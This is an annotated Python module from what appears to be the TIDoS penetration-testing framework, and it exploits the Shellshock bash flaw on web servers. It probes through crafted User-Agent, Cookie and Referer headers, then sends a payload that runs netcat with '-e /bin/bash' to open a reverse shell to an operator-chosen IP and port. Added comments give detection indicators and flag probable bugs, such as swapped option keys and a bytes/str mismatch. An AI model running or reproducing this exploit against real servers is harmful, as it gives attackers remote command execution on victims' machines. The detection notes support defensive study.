shellshocksploit.py
#!/usr/bin/env python3
# coding: utf-8
#-:-:-:-:-:-:-:-:-:-:-:-:#
# TIDoS Framework #
#-:-:-:-:-:-:-:-:-:-:-:-:#
#Author: @_tID
#This module requires TIDoS Framework
#https://github.com/0xInfection/TIDoS-Framework
from core.methods.tor import session
import time
from random import *
import string
import re
from core.Core.colors import *
# Module metadata: a short description and the string used when searching modules.
info = "Shellshock Exploit."
searchinfo = "Shellshock Exploit"

# Operator-settable options, each stored as [description, value].
# A value of a single space means "not set": shellshock0x00() compares
# against " " and falls back to an interactive prompt in that case.
properties = {
    "SHELL-IP": ["IP for the reverse shell to connect to", " "],
    "SHELL-PORT": ["Port for the reverse shell to connect to", " "],
}
def shellshock0x00(web):
    """Probe ``web`` for Shellshock via crafted request headers, then send a follow-up request.

    Flow, as written:
      1. Send one GET whose User-agent carries a bash function-definition
         prefix; a 500 or 502 status is treated as "seems vulnerable".
      2. Send a second GET whose User-Agent, Cookie and Referer ask the
         server to echo a random marker; a 200 response containing the
         marker is treated as confirmation.
      3. On confirmation, read SHELL-IP / SHELL-PORT (or prompt for them)
         and send a third GET carrying the command built from those values.

    Returns nothing; all results are reported with print().

    Defensive notes for readers of this listing:
      * Every probe places a value beginning with ``() {`` in a request
        header. That prefix in User-Agent, Cookie or Referer is the
        indicator to alert on in web-server and proxy logs.
      * On a bash build that no longer imports function definitions from
        arbitrary environment variables, these headers are inert.
      * This routine is only appropriate against systems the operator is
        authorised to test.

    NOTE(review): the listing lost its indentation. The nesting below is
    reconstructed from the statement order; the placement of the first
    ``else`` is uncertain (see the comment there).
    """
    # session() is imported from core.methods.tor; presumably a
    # requests-compatible session object -- confirm in that module.
    requests = session()
    print(GR+' [*] Parsing strings...')
    time.sleep(0.5)
    # 30 distinct ASCII letters (sample() draws without replacement), used
    # only as a marker to look for in the response body.
    r_str = ''.join(Random().sample(string.ascii_letters, 30))
    print(GR+' [*] Configuring payloads...')
    # Confirmation probe: function-definition prefix followed by an echo of the marker.
    con = '() { :;}; echo; echo; echo %s'%(r_str)
    # First-stage probe: function-definition prefix followed by a /bin path.
    # Presumably the path does not exist, so a vulnerable CGI errors out -- TODO confirm.
    cmd = "() { test;};/bin/nopatchobfu"
    headers = {'User-agent': cmd}
    time.sleep(0.5)
    print(C+' [*] Making no-verify request...')
    time.sleep(1)
    # verify=False turns off TLS certificate validation (requests semantics),
    # so the peer is not authenticated on any of the three requests.
    r = requests.get(web, headers=headers, verify=False)
    # NOTE(review): any 500/502 passes this gate, whatever caused it, so this
    # stage alone is a weak signal and can report false positives.
    if r.status_code == 500 or r.status_code == 502:
        print(G+' [+] The website seems Vulnerable to Shellshock...'+C+color.TR2+C)
        time.sleep(0.5)
        print(C+' [*] Confirming the vulnerability...'+C)
        # The same marker-echo string is sent in three headers at once.
        headers = {
            'User-Agent' : con,
            'Cookie' : con,
            'Referer' : con
        }
        resp = requests.get(web, headers=headers, verify=False)
        if resp.status_code == 200:
            # NOTE(review): r_str is a str pattern; if resp.content is bytes
            # (as it is on a requests Response), re.search raises TypeError
            # under Python 3 and the confirmation never completes -- confirm.
            if re.search(r_str,resp.content,re.I):
                print(O+' [+] ShellShock was found in:'+C+color.TR3+C+G+resp.url+C+color.TR2+C)
                print(P+' [*] Preparing for the exploitation phase...'+C)
                time.sleep(0.4)
                print(GR+' [*] Configuring payload...')
                # A value of " " is the "not set" sentinel from `properties`.
                if properties["SHELL-IP"][1] == " ":
                    ip = input(C+' [§] Enter reverse IP :> ')
                else:
                    # NOTE(review): this branch reads SHELL-PORT, not SHELL-IP;
                    # looks like a key mix-up -- confirm against the repository.
                    ip = properties["SHELL-PORT"][1]
                # NOTE(review): the port prompt is gated on SHELL-IP, not on
                # SHELL-PORT -- confirm the intended key.
                if properties["SHELL-IP"][1] == " ":
                    port = input(' [§] Enter port :> ')
                else:
                    port = properties["SHELL-PORT"][1]
                # ip and port are concatenated into the command string with no
                # validation or quoting; whatever the operator typed is sent as-is.
                exp = '() { :; }; /bin/bash -c "nc -v '+str(ip)+' '+str(port)+' -e /bin/bash -i"'
                time.sleep(0.7)
                print(C+' [!] Using payload : '+B+exp)
                print(GR+' [*] Exploiting...')
                time.sleep(1)
                # NOTE(review): the message ties verify=False to IP leakage, but
                # that flag only disables certificate validation; whether traffic
                # is anonymised depends on what session() returns.
                print(P+' [!] Using no-verify mode to avoid IP leakage...'+C)
                try:
                    head = {'User-agent':exp}
                    # The response is assigned but never inspected; nothing is
                    # printed when the request completes without raising.
                    r=requests.get(web, headers=head, verify=False)
                except Exception:
                    # Every exception type is reported with the same message.
                    print(R+' [-] Exploit failed...')
        # NOTE(review): placed against the status-code check as a best guess;
        # with the indentation lost it could equally belong to the marker test
        # above. Confirm against the repository before relying on this.
        else:
            print(R+' [-] 2nd phase of detection does not reveal vulnerability...')
            print(R+' [!] Please check manually...')
    else:
        # Reached whenever the first request returns anything other than 500/502.
        print(R+' [-] The website seems immune to shellshock...')
def shellshock_exp(web):
    """Announce the module, print its banner, then run shellshock0x00 on ``web``.

    ``web`` is passed through unchanged. Nothing is returned.
    """
    loading_msg = GR + '\n [*] Loading module...'
    print(loading_msg)
    time.sleep(0.5)

    # Imported at call time, after the loading message, exactly as before;
    # psploit comes from the framework's own print helpers.
    from core.methods.print import psploit

    psploit("shellshock")
    shellshock0x00(web)
def attack(web):
    """Run the module against the URL held in ``web.fullurl``.

    Presumably the entry point the framework calls with its target
    object -- confirm against the framework's module loader.
    """
    target_url = web.fullurl
    shellshock_exp(target_url)